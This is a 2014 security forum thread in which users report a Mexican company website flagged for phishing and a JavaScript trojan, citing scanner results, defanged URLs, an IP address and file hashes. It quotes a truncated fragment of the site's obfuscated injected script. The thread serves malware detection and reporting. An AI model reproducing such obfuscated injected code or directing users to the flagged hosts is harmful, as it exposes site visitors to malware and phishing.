PHISH not detected?

polonus · June 25, 2014, 10:03am

See: http://quttera.com/#online url malware scanner
Detected here: http://app.webinspector.com/public/reports/22752072
Trjan detected: Name: TrojWare.JS.Agent.caa
iFrame check: Suspicious

htxp://www.centigon.com.mx/formulario.html’
htxp://www.centigon.com.mx/footer/footer.html’

Javascript Check:
Suspicious

nguage=“javascript”> function dnnviewstate() { var a=0,m,v,t,z,x=new array(‘9091968376’,‘8887918192818786347374918784939277359287883421333333338896’,‘778787’,'94999

PHISH: http://support.clean-mx.de/clean-mx/phishing.php?email=abuse@omnis.com&response=

elevated exposure

polonus

jeffersonsant · June 25, 2014, 9:55pm

hello

already is detected by Avast

JS:Clickjack-B [trj]

http://sitecheck.sucuri.net/results/www.centigon.com.mx

polonus · June 26, 2014, 5:14pm

Hi jefferson santiag,

Thanks for checking and now we can turn that question mark into an exclamation mark ;D

pol

polonus · June 27, 2014, 10:36pm

Is this IP flagged: 46.30.212.183?
See: http://support.clean-mx.de/clean-mx/phishing.php?id=3832678
High risk page on IP: http://app.webinspector.com/public/reports/22785834
Flagged by both McAfee Site Advisor and WOT.
see: http://totalhash.com/analysis/d29105ccf49f3786032550dd128fa42e7056cb44
avast does detect as Win32:Alureon-BBR [Cryp]: https://www.virustotal.com/en/file/cc3cfb4f4a69fd7842dcda63840fb7ebe40110508f7dfb8205402a947c383484/analysis/

polonus

PHISH not detected?

Announcements